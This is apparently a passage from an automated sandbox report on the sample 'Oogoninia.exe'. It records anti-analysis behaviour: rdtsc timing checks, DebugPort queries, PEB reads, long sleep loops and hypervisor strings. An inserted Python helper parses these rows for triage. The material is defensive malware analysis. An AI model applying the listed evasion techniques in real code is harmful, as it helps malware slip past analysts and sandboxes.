        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B35192 push eax; ret 9_2_04B35194
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B293AC push esp; iretd 9_2_04B293B4
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 30733AC
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 1A533AC
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0F0594
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0EFF74
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED6C4
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED864
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED144
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0F0594
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED764
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED324
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED364
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED004
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0EFF74
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED6C4
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED864
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 rdtsc 2_2_32561763
        Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\grpconv.exeAPI coverage: 1.2 %
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904 | Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904 | Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904 | Thread sleep count: 9852 > 30
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904 | Thread sleep time: -19704000s >= -30000s
        Source: C:\Windows\SysWOW64\grpconv.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\grpconv.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_004060A4 FindFirstFileA,FindClose
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_0040270B FindFirstFileA
        Source: Oogoninia.exe, 00000002.00000003.1266977009.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354263850.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2834223466.000000000DDBC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009FC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5992234952.000000000DDBC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
        Source: grpconv.exe, 00000009.00000002.2899155555.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | API call chain: ExitProcess graph end node (graph_0-3797)
        Source: C:\Users\user\Desktop\Oogoninia.exe | API call chain: ExitProcess graph end node (graph_0-3977)
        Source: C:\Windows\SysWOW64\grpconv.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\grpconv.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\grpconv.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32561763 rdtsc
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00402B0E RegOpenKeyExA,RegEnumKeyA,RegEnumKeyA,RegCloseKey,LdrInitializeThunk,RegCloseKey,RegDeleteKeyA
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
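Added example (not part of the Joe Sandbox report): a small Python triage helper for evidence rows in exactly the flattened form in which this report is extracted. It re-splits the process-path and detail columns that were fused together, strips the glued "Jump to behavior" link text and the repeated function id, labels each row with the anti-analysis technique it evidences (rdtsc timing, DebugPort query, PEB reads through fs:[30h], sleep loops, the interceptor hits, the "Hyper-V RAW" string), collapses the one-row-per-read PEB listing to reads per function, and derives the length of a single sleep from the sleep count and accumulated sleep time. The sample rows are copied from this section; the technique labels, and the assumption that the two sleep-count/sleep-time pairs for TID 6904 are threshold snapshots of the same delay loop, are mine.

```python
import re
from collections import Counter

# Constructed sample: evidence rows copied from the report in the flattened form
# produced by extraction (process path fused to the detail column, "Jump to
# behavior" link text glued to the end, function id repeated as a trailing link).
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0F0594
Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 rdtsc 2_2_32561763
Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep count: 122 > 30Jump to behavior
Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep time: -244000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep count: 9852 > 30Jump to behavior
Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep time: -19704000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32540230 mov ecx, dword ptr fs:[00000030h]2_2_32540230
Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00402B0E RegOpenKeyExA,RegEnumKeyA,RegCloseKey,LdrInitializeThunk,RegDeleteKeyA,0_2_00402B0E
Source: grpconv.exe, 00000009.00000002.2899155555.0000000002CCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
"""

# The source column ends in a process path (.exe), optionally followed by a
# thread id, or in a memory-dump name (.sdmp); the detail column starts with a
# capital letter and may carry glued link text at its end.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?(?:\.exe|\.sdmp)(?:\s+TID:\s*\d+)?)"
    r"(?P<detail>[A-Z].*?)(?:Jump to behavior|Jump to dropped file)?$"
)
# "Code function: <id> <text><id>": the trailing <id> is the report's link duplicate.
FUNC_RE = re.compile(r"^Code function: (\d+_\d+_[0-9A-F]{8}) (.*?),?\1$")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time: -(\d+)s")


def parse_row(line):
    """Split one flattened row into source and detail; None if it is not a row."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    detail = m.group("detail").strip()
    f = FUNC_RE.match(detail)
    if f:
        detail = f"Code function: {f.group(1)} {f.group(2).strip()}"
    return {"source": m.group("source").strip(), "detail": detail}


def parse_report(text):
    return [r for r in (parse_row(line) for line in text.splitlines()) if r]


def classify(detail):
    """Label a row with the anti-analysis technique it evidences (labels are mine)."""
    if "fs:[00000030h]" in detail:
        return "peb_read"          # fs:[30h] is the PEB pointer in the 32-bit TEB
    if detail.endswith(" rdtsc"):
        return "rdtsc_timing"      # timestamp-counter delta checks
    if detail.startswith("Process queried: DebugPort"):
        return "debugport_query"   # ProcessDebugPort via NtQueryInformationProcess
    if detail.startswith("Thread sleep"):
        return "sleep_evasion"
    if detail.startswith("API/Special instruction interceptor"):
        return "special_instruction"
    if "Hyper-V" in detail:
        return "hypervisor_string"
    if "LdrInitializeThunk" in detail:
        return "loader_access"
    return "other"


def peb_reads_per_function(rows):
    """Collapse the one-row-per-read PEB listing into reads per function id."""
    counts = Counter(r["detail"].split()[2] for r in rows
                     if classify(r["detail"]) == "peb_read")
    return dict(counts)


def sleep_summary(rows):
    """Largest sleep count and accumulated sleep time reported, and the length of
    one sleep (total / count) in the report's own units.  Assumption: the report
    re-emits a row each time a threshold is crossed, so the maxima describe the
    same delay loop."""
    counts, totals = [], []
    for r in rows:
        c = SLEEP_COUNT_RE.search(r["detail"])
        t = SLEEP_TIME_RE.search(r["detail"])
        if c:
            counts.append(int(c.group(1)))
        if t:
            totals.append(int(t.group(1)))
    if not counts or not totals:
        return None
    count, total = max(counts), max(totals)
    return {"count": count, "total": total, "per_sleep": total / count}


def triage(text):
    rows = parse_report(text)
    return {
        "rows": len(rows),
        "technique_counts": dict(Counter(classify(r["detail"]) for r in rows)),
        "peb_functions": peb_reads_per_function(rows),
        "sleep": sleep_summary(rows),
        "special_instruction_addresses": sorted(
            r["detail"].rsplit(" ", 1)[1] for r in rows
            if classify(r["detail"]) == "special_instruction"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_ROWS), indent=2))
```

Run against the full section, the helper turns the 250-odd PEB rows into a per-function count, which is the number an analyst actually wants when deciding where to patch out the BeingDebugged/NtGlobalFlag checks, and gives 2000 (report units) per sleep for the 9852-iteration loop in grpconv.exe. Note also that the interceptor addresses (7FFE...) lie in the 64-bit address range although grpconv.exe is the SysWOW64 binary, which is consistent with the report's direct/indirect syscall signature.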
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: reads of the PEB pointer at fs:[00000030h]; the report lists one row per read, collapsed here to one row per function (function id, instruction, number of reads):
          2_2_325E124C  mov eax, dword ptr fs:[00000030h]  x4
          2_2_325DF247  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3254F24A  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251B273  mov eax, dword ptr fs:[00000030h]  x3
          2_2_325B327E  mov eax, dword ptr fs:[00000030h]  x6
          2_2_325DD270  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251821B  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325AB214  mov eax, dword ptr fs:[00000030h]  x2
          2_2_3251A200  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32540230  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_325A0227  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3255A22B  mov eax, dword ptr fs:[00000030h]  x3
          2_2_325432C5  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325F32C9  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325302F9  mov eax, dword ptr fs:[00000030h]  x8
          2_2_325172E0  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3252A2E0  mov eax, dword ptr fs:[00000030h]  x6
          2_2_325282E0  mov eax, dword ptr fs:[00000030h]  x4
          2_2_3251D2EC  mov eax, dword ptr fs:[00000030h]  x2
          2_2_3259E289  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251C2B0  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_325FB2BC  mov eax, dword ptr fs:[00000030h]  x4
          2_2_325DF2AE  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325E92AB  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325442AF  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325192AF  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3255A350  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32518347  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3259E372  mov eax, dword ptr fs:[00000030h]  x4
          2_2_325A0371  mov eax, dword ptr fs:[00000030h]  x2
          2_2_3254237A  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3252B360  mov eax, dword ptr fs:[00000030h]  x6
          2_2_3255E363  mov eax, dword ptr fs:[00000030h]  x8
          2_2_3253E310  mov eax, dword ptr fs:[00000030h]  x3
          2_2_32539319  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3255631F  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32519303  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325A330C  mov eax, dword ptr fs:[00000030h]  x4
          2_2_325DF30A  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325F3336  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32558322  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3254332D  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251E328  mov eax, dword ptr fs:[00000030h]  x3
          2_2_325533D0  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325543D0  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_325A43D5  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251E3C0  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3251C3C7  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325263CB  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3254A390  mov eax, dword ptr fs:[00000030h]  x3
          2_2_32521380  mov eax, dword ptr fs:[00000030h]  x5
          2_2_3253F380  mov eax, dword ptr fs:[00000030h]  x6
          2_2_325DF38A  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3259C3B0  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325293A6  mov eax, dword ptr fs:[00000030h]  x2
          2_2_32521051  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325F505B  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32550044  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32527072  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32526074  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325C9060  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32562010  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_32545004  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32545004  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_32528009  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251D02D  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3253B0D0  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251B0D6  mov eax, dword ptr fs:[00000030h]  x4
          2_2_3255D0F0  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3255D0F0  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_3251C0F6  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325190F8  mov eax, dword ptr fs:[00000030h]  x4
          2_2_3251C090  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251A093  mov ecx, dword ptr fs:[00000030h]  x1
          2_2_325F4080  mov eax, dword ptr fs:[00000030h]  x7
          2_2_325DB0AF  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325600A5  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325F3157  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3255415F  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325B314A  mov eax, dword ptr fs:[00000030h]  x4
          2_2_3251A147  mov eax, dword ptr fs:[00000030h]  x3
          2_2_325F5149  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32526179  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3257717A  mov eax, dword ptr fs:[00000030h]  x2
          2_2_3255716D  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3251F113  mov eax, dword ptr fs:[00000030h]  x21
          2_2_32550118  mov eax, dword ptr fs:[00000030h]  x1
          2_2_3254510F  mov eax, dword ptr fs:[00000030h]  x13
          2_2_3252510D  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325DF13E  mov eax, dword ptr fs:[00000030h]  x1
          2_2_325AA130  mov eax, dword ptr fs:[00000030h]  x1
          2_2_32557128  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325301C0  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325351C0  mov eax, dword ptr fs:[00000030h]  x4
          2_2_325191F0  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325301F1  mov eax, dword ptr fs:[00000030h]  x3
          2_2_3254F1F0  mov eax, dword ptr fs:[00000030h]  x2
          2_2_325E81EE  mov eax, dword ptr fs:[00000030h]  x2
          2_2_3252A1E3  mov eax, dword ptr fs:[00000030h]  x5
          2_2_3254B1E0  mov eax, dword ptr fs:[00000030h]  x7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325291E5 mov eax, dword ptr fs:[00000030h]2_2_325291E5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325291E5 mov eax, dword ptr fs:[00000030h]2_2_325291E5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325181EB mov eax, dword ptr fs:[00000030h]2_2_325181EB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32549194 mov eax, dword ptr fs:[00000030h]2_2_32549194
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561190 mov eax, dword ptr fs:[00000030h]2_2_32561190
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561190 mov eax, dword ptr fs:[00000030h]2_2_32561190
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F51B6 mov eax, dword ptr fs:[00000030h]2_2_325F51B6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325531BE mov eax, dword ptr fs:[00000030h]2_2_325531BE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325531BE mov eax, dword ptr fs:[00000030h]2_2_325531BE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov ecx, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov eax, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov eax, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E1A4 mov eax, dword ptr fs:[00000030h]2_2_3255E1A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E1A4 mov eax, dword ptr fs:[00000030h]2_2_3255E1A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32555654 mov eax, dword ptr fs:[00000030h]2_2_32555654
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252965A mov eax, dword ptr fs:[00000030h]2_2_3252965A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252965A mov eax, dword ptr fs:[00000030h]2_2_3252965A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov eax, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov ecx, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov eax, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523640 mov eax, dword ptr fs:[00000030h]2_2_32523640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C640 mov eax, dword ptr fs:[00000030h]2_2_3255C640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C640 mov eax, dword ptr fs:[00000030h]2_2_3255C640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D64A mov eax, dword ptr fs:[00000030h]2_2_3251D64A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D64A mov eax, dword ptr fs:[00000030h]2_2_3251D64A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520670 mov eax, dword ptr fs:[00000030h]2_2_32520670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562670 mov eax, dword ptr fs:[00000030h]2_2_32562670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562670 mov eax, dword ptr fs:[00000030h]2_2_32562670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov esi, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov eax, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov eax, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D600 mov eax, dword ptr fs:[00000030h]2_2_3254D600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D600 mov eax, dword ptr fs:[00000030h]2_2_3254D600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF607 mov eax, dword ptr fs:[00000030h]2_2_325DF607
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255360F mov eax, dword ptr fs:[00000030h]2_2_3255360F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4600 mov eax, dword ptr fs:[00000030h]2_2_325F4600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520630 mov eax, dword ptr fs:[00000030h]2_2_32520630
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550630 mov eax, dword ptr fs:[00000030h]2_2_32550630
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov esi, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov eax, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov eax, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255F63F mov eax, dword ptr fs:[00000030h]2_2_3255F63F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255F63F mov eax, dword ptr fs:[00000030h]2_2_3255F63F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov ecx, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov ecx, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov eax, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32525622 mov eax, dword ptr fs:[00000030h]2_2_32525622
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32525622 mov eax, dword ptr fs:[00000030h]2_2_32525622
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32527623 mov eax, dword ptr fs:[00000030h]2_2_32527623
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C620 mov eax, dword ptr fs:[00000030h]2_2_3255C620
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D6D0 mov eax, dword ptr fs:[00000030h]2_2_3254D6D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325206CF mov eax, dword ptr fs:[00000030h]2_2_325206CF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325C86C2 mov eax, dword ptr fs:[00000030h]2_2_325C86C2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259C6F2 mov eax, dword ptr fs:[00000030h]2_2_3259C6F2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259C6F2 mov eax, dword ptr fs:[00000030h]2_2_3259C6F2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325196E0 mov eax, dword ptr fs:[00000030h]2_2_325196E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325196E0 mov eax, dword ptr fs:[00000030h]2_2_325196E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252C6E0 mov eax, dword ptr fs:[00000030h]2_2_3252C6E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325466E0 mov eax, dword ptr fs:[00000030h]2_2_325466E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325466E0 mov eax, dword ptr fs:[00000030h]2_2_325466E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528690 mov eax, dword ptr fs:[00000030h]2_2_32528690
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259D69D mov eax, dword ptr fs:[00000030h]2_2_3259D69D
